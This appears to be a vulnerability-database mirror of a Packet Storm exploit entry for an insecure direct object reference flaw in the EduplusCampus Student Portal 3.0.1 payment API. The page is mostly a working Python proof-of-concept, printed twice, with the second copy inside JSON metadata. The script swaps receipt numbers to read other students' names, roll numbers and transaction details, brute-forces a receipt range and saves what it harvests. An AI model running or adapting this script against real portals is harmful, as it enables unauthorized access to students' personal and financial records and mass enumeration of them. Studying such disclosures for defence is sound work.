📄 EduplusCampus Student Portal 3.0.1 Insecure Direct Object Reference

6.5 / 10

MEDIUM

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Description

EduplusCampus Student Portal version 3.0.1 suffers from an insecure direct object reference vulnerability...

Visit Original Source

Basic Information

ID PACKETSTORM:212772

Published Dec 12, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : EduplusCampus student portal v 3.0.1 Broken Access Control |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://www.edupluscampus.com |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/211727/

[+] Summary : Insecure Direct Object Reference (IDOR) vulnerability in EduplusCampus Student Payment API (version 3.0.1)
that allows authenticated users to access other students' sensitive financial and personal information without proper authorization.

[+] POC :

#!/usr/bin/env python3
"""
Proof of Concept: CVE-2025-61148
IDOR Vulnerability in EduplusCampus Student Payment API
Author: indoushka
"""

import requests
import json
import sys
import argparse
from colorama import Fore, Style, init

# Initialize colorama for colored output
init(autoreset=True)

class CVE202561148_POC:
def __init__(self, base_url, auth_token):
self.base_url = base_url.rstrip('/')
self.headers = {
'Authorization': f'Bearer {auth_token}',
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (Security-Test)'
}

def print_banner(self):
"""Display vulnerability banner"""
banner = f"""
{Fore.RED}╔══════════════════════════════════════════════════════════════╗
║ CVE-2025-61148: IDOR Vulnerability POC ║
║ EduplusCampus Student Payment API ║
╚══════════════════════════════════════════════════════════════╝{Style.RESET_ALL}
"""
print(banner)

def test_idor(self, original_rec_no, target_rec_no):
"""Test IDOR vulnerability by modifying rec_no parameter"""
endpoint = f"{self.base_url}/student/get-receipt"

# Original request (authorized)
original_data = {
"rec_no": original_rec_no
}

# Malicious request (unauthorized access attempt)
malicious_data = {
"rec_no": target_rec_no
}

print(f"{Fore.CYAN}[*] Testing IDOR vulnerability...{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[+] Original receipt number: {original_rec_no}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[+] Target receipt number: {target_rec_no}{Style.RESET_ALL}")

try:
# Test with original receipt number
print(f"\n{Fore.WHITE}[1] Sending request for authorized receipt...{Style.RESET_ALL}")
resp_original = requests.post(
endpoint,
headers=self.headers,
json=original_data,
timeout=30
)

# Test with target receipt number
print(f"{Fore.WHITE}[2] Sending request for target receipt (IDOR test)...{Style.RESET_ALL}")
resp_target = requests.post(
endpoint,
headers=self.headers,
json=malicious_data,
timeout=30
)

# Analyze responses
self.analyze_responses(resp_original, resp_target)

except requests.exceptions.RequestException as e:
print(f"{Fore.RED}[-] Request failed: {str(e)}{Style.RESET_ALL}")
return False

def analyze_responses(self, resp_original, resp_target):
"""Analyze and compare the responses"""
print(f"\n{Fore.CYAN}[*] Response Analysis:{Style.RESET_ALL}")
print(f"{'='*60}")

# Original response
print(f"{Fore.GREEN}[+] Original Request (Authorized):{Style.RESET_ALL}")
print(f" Status Code: {resp_original.status_code}")
if resp_original.status_code == 200:
try:
data = resp_original.json()
print(f" Response Length: {len(resp_original.text)} characters")
if 'fullname' in data:
print(f" Contains PII: {Fore.RED}YES{Style.RESET_ALL}")
except:
print(f" Response: {resp_original.text[:100]}...")

# Target response
print(f"\n{Fore.RED}[+] Target Request (Unauthorized):{Style.RESET_ALL}")
print(f" Status Code: {resp_target.status_code}")

if resp_target.status_code == 200:
try:
data = resp_target.json()
print(f" Response Length: {len(resp_target.text)} characters")

# Check if vulnerable
if 'fullname' in data or 'rollno' in data:
print(f"{Fore.RED}[!] VULNERABLE - Successfully accessed other user's data!{Style.RESET_ALL}")
print(f"\n{Fore.YELLOW}[*] Exposed Information:{Style.RESET_ALL}")

# Display sensitive data (redacted for safety)
sensitive_keys = ['fullname', 'rollno', 'component_total_amount',
'trans_list', 'tid', 'date', 'amount']

for key in sensitive_keys:
if key in str(data):
if key == 'fullname':
print(f" • Full Name: {Fore.RED}[REDACTED]{Style.RESET_ALL}")
elif key == 'rollno':
print(f" • Roll Number: {data.get('rollno', 'N/A')}")
elif key == 'component_total_amount':
print(f" • Payment Amount: {data.get('component_total_amount', 'N/A')}")
elif key == 'trans_list':
transactions = data.get('trans_list', [])
if transactions:
print(f" • Transaction Details:")
for trans in transactions:
print(f" - Date: {trans.get('date', 'N/A')}")
print(f" - Amount: {trans.get('amount', 'N/A')}")
print(f" - TID: {trans.get('tid', 'N/A')}")

# Save proof
self.save_proof(data)

except json.JSONDecodeError:
print(f" Response: {resp_target.text[:200]}...")
if len(resp_target.text) > 100:
print(f"{Fore.RED}[!] Potential vulnerability detected!{Style.RESET_ALL}")
else:
print(f" Response: {resp_target.text[:100]}...")

def save_proof(self, data):
"""Save proof of concept results"""
filename = f"idor_proof_cve_2025_61148.json"
with open(filename, 'w') as f:
json.dump(data, f, indent=2)
print(f"\n{Fore.GREEN}[+] Proof saved to: {filename}{Style.RESET_ALL}")

def brute_force_receipts(self, prefix="PCUF-", start=231800, end=232100):
"""Attempt to discover valid receipt numbers"""
print(f"\n{Fore.CYAN}[*] Brute-forcing receipt numbers...{Style.RESET_ALL}")
print(f" Range: {prefix}{start} to {prefix}{end}")

found_receipts = []
endpoint = f"{self.base_url}/student/get-receipt"

for i in range(start, end + 1):
rec_no = f"{prefix}{i}"

data = {"rec_no": rec_no}

try:
resp = requests.post(
endpoint,
headers=self.headers,
json=data,
timeout=10
)

if resp.status_code == 200:
print(f"{Fore.GREEN}[+] Found valid receipt: {rec_no}{Style.RESET_ALL}")
found_receipts.append(rec_no)

# Quick analysis
try:
resp_data = resp.json()
if 'fullname' in resp_data:
print(f" Contains PII: YES")
except:
pass

except requests.exceptions.RequestException:
continue

return found_receipts

def main():
parser = argparse.ArgumentParser(
description="CVE-2025-61148: IDOR Vulnerability POC for EduplusCampus",
formatter_class=argparse.RawDescriptionHelpFormatter
)

parser.add_argument("-u", "--url", required=True, help="Base URL (e.g., https://student.edupluscampus.com)")
parser.add_argument("-t", "--token", required=True, help="Bearer token for authentication")
parser.add_argument("-o", "--original", help="Original receipt number (authorized)")
parser.add_argument("-T", "--target", help="Target receipt number to test")
parser.add_argument("-b", "--bruteforce", action="store_true", help="Enable brute-force mode")
parser.add_argument("-p", "--prefix", default="PCUF-", help="Receipt number prefix for brute-force")

args = parser.parse_args()

# Initialize POC
poc = CVE202561148_POC(args.url, args.token)
poc.print_banner()

print(f"{Fore.CYAN}[*] Target: {args.url}{Style.RESET_ALL}")
print(f"{Fore.CYAN}[*] Authentication token provided: {'*' * 20}{Style.RESET_ALL}")

if args.bruteforce:
# Brute-force mode
print(f"\n{Fore.YELLOW}[!] Starting brute-force attack...{Style.RESET_ALL}")
found = poc.brute_force_receipts(prefix=args.prefix)

if found:
print(f"\n{Fore.GREEN}[+] Found {len(found)} valid receipt numbers{Style.RESET_ALL}")
for receipt in found:
print(f" • {receipt}")
else:
print(f"{Fore.RED}[-] No valid receipt numbers found in the range{Style.RESET_ALL}")

elif args.original and args.target:
# Specific test mode
poc.test_idor(args.original, args.target)

else:
print(f"{Fore.YELLOW}[!] Usage examples:{Style.RESET_ALL}")
print(f" Specific test: python poc.py -u https://target.com -t YOUR_TOKEN -o PCUF-232025 -T PCUF-231824")
print(f" Brute-force: python poc.py -u https://target.com -t YOUR_TOKEN -b")
print(f"\n{Fore.RED}[!] WARNING: Use only on authorized systems!{Style.RESET_ALL}")

if __name__ == "__main__":
main()

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-12T17:15:06",
    "description": "EduplusCampus Student Portal version 3.0.1 suffers from an insecure direct object reference vulnerability...",
    "published": "2025-12-12T00:00:00",
    "modified": "2025-12-12T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 EduplusCampus Student Portal 3.0.1 Insecure Direct Object Reference",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212772",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-61148"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : EduplusCampus student portal v 3.0.1 Broken Access Control                                                                  |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\n    | # Vendor    : https://www.edupluscampus.com                                                                                               |\n    =============================================================================================================================================\n    \n    [+] References : https://packetstorm.news/files/id/211727/\n    \n    [+] Summary : Insecure Direct Object Reference (IDOR) vulnerability in EduplusCampus Student Payment API (version 3.0.1) \n                  that allows authenticated users to access other students' sensitive financial and personal information without proper authorization.\n    \t\t\t  \n    \t\t\t  \n    [+]  POC : \n    \n    #!/usr/bin/env python3\n    \"\"\"\n    Proof of Concept: CVE-2025-61148\n    IDOR Vulnerability in EduplusCampus Student Payment API\n    Author: indoushka\n    \"\"\"\n    \n    import requests\n    import json\n    import sys\n    import argparse\n    from colorama import Fore, Style, init\n    \n    # Initialize colorama for colored output\n    init(autoreset=True)\n    \n    class CVE202561148_POC:\n        def __init__(self, base_url, auth_token):\n            self.base_url = base_url.rstrip('/')\n            self.headers = {\n                'Authorization': f'Bearer {auth_token}',\n                'Content-Type': 'application/json',\n                'User-Agent': 'Mozilla/5.0 (Security-Test)'\n            }\n            \n        def print_banner(self):\n            \"\"\"Display vulnerability banner\"\"\"\n            banner = f\"\"\"\n    {Fore.RED}\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n    \u2551    CVE-2025-61148: IDOR Vulnerability POC                \u2551\n    \u2551    EduplusCampus Student Payment API                     \u2551\n    \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d{Style.RESET_ALL}\n            \"\"\"\n            print(banner)\n        \n        def test_idor(self, original_rec_no, target_rec_no):\n            \"\"\"Test IDOR vulnerability by modifying rec_no parameter\"\"\"\n            endpoint = f\"{self.base_url}/student/get-receipt\"\n            \n            # Original request (authorized)\n            original_data = {\n                \"rec_no\": original_rec_no\n            }\n            \n            # Malicious request (unauthorized access attempt)\n            malicious_data = {\n                \"rec_no\": target_rec_no\n            }\n            \n            print(f\"{Fore.CYAN}[*] Testing IDOR vulnerability...{Style.RESET_ALL}\")\n            print(f\"{Fore.YELLOW}[+] Original receipt number: {original_rec_no}{Style.RESET_ALL}\")\n            print(f\"{Fore.YELLOW}[+] Target receipt number: {target_rec_no}{Style.RESET_ALL}\")\n            \n            try:\n                # Test with original receipt number\n                print(f\"\\n{Fore.WHITE}[1] Sending request for authorized receipt...{Style.RESET_ALL}\")\n                resp_original = requests.post(\n                    endpoint,\n                    headers=self.headers,\n                    json=original_data,\n                    timeout=30\n                )\n                \n                # Test with target receipt number\n                print(f\"{Fore.WHITE}[2] Sending request for target receipt (IDOR test)...{Style.RESET_ALL}\")\n                resp_target = requests.post(\n                    endpoint,\n                    headers=self.headers,\n                    json=malicious_data,\n                    timeout=30\n                )\n                \n                # Analyze responses\n                self.analyze_responses(resp_original, resp_target)\n                \n            except requests.exceptions.RequestException as e:\n                print(f\"{Fore.RED}[-] Request failed: {str(e)}{Style.RESET_ALL}\")\n                return False\n                \n        def analyze_responses(self, resp_original, resp_target):\n            \"\"\"Analyze and compare the responses\"\"\"\n            print(f\"\\n{Fore.CYAN}[*] Response Analysis:{Style.RESET_ALL}\")\n            print(f\"{'='*60}\")\n            \n            # Original response\n            print(f\"{Fore.GREEN}[+] Original Request (Authorized):{Style.RESET_ALL}\")\n            print(f\"    Status Code: {resp_original.status_code}\")\n            if resp_original.status_code == 200:\n                try:\n                    data = resp_original.json()\n                    print(f\"    Response Length: {len(resp_original.text)} characters\")\n                    if 'fullname' in data:\n                        print(f\"    Contains PII: {Fore.RED}YES{Style.RESET_ALL}\")\n                except:\n                    print(f\"    Response: {resp_original.text[:100]}...\")\n            \n            # Target response\n            print(f\"\\n{Fore.RED}[+] Target Request (Unauthorized):{Style.RESET_ALL}\")\n            print(f\"    Status Code: {resp_target.status_code}\")\n            \n            if resp_target.status_code == 200:\n                try:\n                    data = resp_target.json()\n                    print(f\"    Response Length: {len(resp_target.text)} characters\")\n                    \n                    # Check if vulnerable\n                    if 'fullname' in data or 'rollno' in data:\n                        print(f\"{Fore.RED}[!] VULNERABLE - Successfully accessed other user's data!{Style.RESET_ALL}\")\n                        print(f\"\\n{Fore.YELLOW}[*] Exposed Information:{Style.RESET_ALL}\")\n                        \n                        # Display sensitive data (redacted for safety)\n                        sensitive_keys = ['fullname', 'rollno', 'component_total_amount', \n                                        'trans_list', 'tid', 'date', 'amount']\n                        \n                        for key in sensitive_keys:\n                            if key in str(data):\n                                if key == 'fullname':\n                                    print(f\"    \u2022 Full Name: {Fore.RED}[REDACTED]{Style.RESET_ALL}\")\n                                elif key == 'rollno':\n                                    print(f\"    \u2022 Roll Number: {data.get('rollno', 'N/A')}\")\n                                elif key == 'component_total_amount':\n                                    print(f\"    \u2022 Payment Amount: {data.get('component_total_amount', 'N/A')}\")\n                                elif key == 'trans_list':\n                                    transactions = data.get('trans_list', [])\n                                    if transactions:\n                                        print(f\"    \u2022 Transaction Details:\")\n                                        for trans in transactions:\n                                            print(f\"      - Date: {trans.get('date', 'N/A')}\")\n                                            print(f\"      - Amount: {trans.get('amount', 'N/A')}\")\n                                            print(f\"      - TID: {trans.get('tid', 'N/A')}\")\n                    \n                        # Save proof\n                        self.save_proof(data)\n                        \n                except json.JSONDecodeError:\n                    print(f\"    Response: {resp_target.text[:200]}...\")\n                    if len(resp_target.text) > 100:\n                        print(f\"{Fore.RED}[!] Potential vulnerability detected!{Style.RESET_ALL}\")\n            else:\n                print(f\"    Response: {resp_target.text[:100]}...\")\n        \n        def save_proof(self, data):\n            \"\"\"Save proof of concept results\"\"\"\n            filename = f\"idor_proof_cve_2025_61148.json\"\n            with open(filename, 'w') as f:\n                json.dump(data, f, indent=2)\n            print(f\"\\n{Fore.GREEN}[+] Proof saved to: {filename}{Style.RESET_ALL}\")\n        \n        def brute_force_receipts(self, prefix=\"PCUF-\", start=231800, end=232100):\n            \"\"\"Attempt to discover valid receipt numbers\"\"\"\n            print(f\"\\n{Fore.CYAN}[*] Brute-forcing receipt numbers...{Style.RESET_ALL}\")\n            print(f\"    Range: {prefix}{start} to {prefix}{end}\")\n            \n            found_receipts = []\n            endpoint = f\"{self.base_url}/student/get-receipt\"\n            \n            for i in range(start, end + 1):\n                rec_no = f\"{prefix}{i}\"\n                \n                data = {\"rec_no\": rec_no}\n                \n                try:\n                    resp = requests.post(\n                        endpoint,\n                        headers=self.headers,\n                        json=data,\n                        timeout=10\n                    )\n                    \n                    if resp.status_code == 200:\n                        print(f\"{Fore.GREEN}[+] Found valid receipt: {rec_no}{Style.RESET_ALL}\")\n                        found_receipts.append(rec_no)\n                        \n                        # Quick analysis\n                        try:\n                            resp_data = resp.json()\n                            if 'fullname' in resp_data:\n                                print(f\"    Contains PII: YES\")\n                        except:\n                            pass\n                            \n                except requests.exceptions.RequestException:\n                    continue\n            \n            return found_receipts\n    \n    def main():\n        parser = argparse.ArgumentParser(\n            description=\"CVE-2025-61148: IDOR Vulnerability POC for EduplusCampus\",\n            formatter_class=argparse.RawDescriptionHelpFormatter\n        )\n        \n        parser.add_argument(\"-u\", \"--url\", required=True, help=\"Base URL (e.g., https://student.edupluscampus.com)\")\n        parser.add_argument(\"-t\", \"--token\", required=True, help=\"Bearer token for authentication\")\n        parser.add_argument(\"-o\", \"--original\", help=\"Original receipt number (authorized)\")\n        parser.add_argument(\"-T\", \"--target\", help=\"Target receipt number to test\")\n        parser.add_argument(\"-b\", \"--bruteforce\", action=\"store_true\", help=\"Enable brute-force mode\")\n        parser.add_argument(\"-p\", \"--prefix\", default=\"PCUF-\", help=\"Receipt number prefix for brute-force\")\n        \n        args = parser.parse_args()\n        \n        # Initialize POC\n        poc = CVE202561148_POC(args.url, args.token)\n        poc.print_banner()\n        \n        print(f\"{Fore.CYAN}[*] Target: {args.url}{Style.RESET_ALL}\")\n        print(f\"{Fore.CYAN}[*] Authentication token provided: {'*' * 20}{Style.RESET_ALL}\")\n        \n        if args.bruteforce:\n            # Brute-force mode\n            print(f\"\\n{Fore.YELLOW}[!] Starting brute-force attack...{Style.RESET_ALL}\")\n            found = poc.brute_force_receipts(prefix=args.prefix)\n            \n            if found:\n                print(f\"\\n{Fore.GREEN}[+] Found {len(found)} valid receipt numbers{Style.RESET_ALL}\")\n                for receipt in found:\n                    print(f\"    \u2022 {receipt}\")\n            else:\n                print(f\"{Fore.RED}[-] No valid receipt numbers found in the range{Style.RESET_ALL}\")\n        \n        elif args.original and args.target:\n            # Specific test mode\n            poc.test_idor(args.original, args.target)\n        \n        else:\n            print(f\"{Fore.YELLOW}[!] Usage examples:{Style.RESET_ALL}\")\n            print(f\"    Specific test: python poc.py -u https://target.com -t YOUR_TOKEN -o PCUF-232025 -T PCUF-231824\")\n            print(f\"    Brute-force: python poc.py -u https://target.com -t YOUR_TOKEN -b\")\n            print(f\"\\n{Fore.RED}[!] WARNING: Use only on authorized systems!{Style.RESET_ALL}\")\n    \n    if __name__ == \"__main__\":\n        main()\n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212772",
    "cvss": {
        "score": 6.5,
        "severity": "MEDIUM",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212772/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 EduplusCampus Student Portal 3.0.1 Insecure Direct Object Reference_PACKETSTORM:212772

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply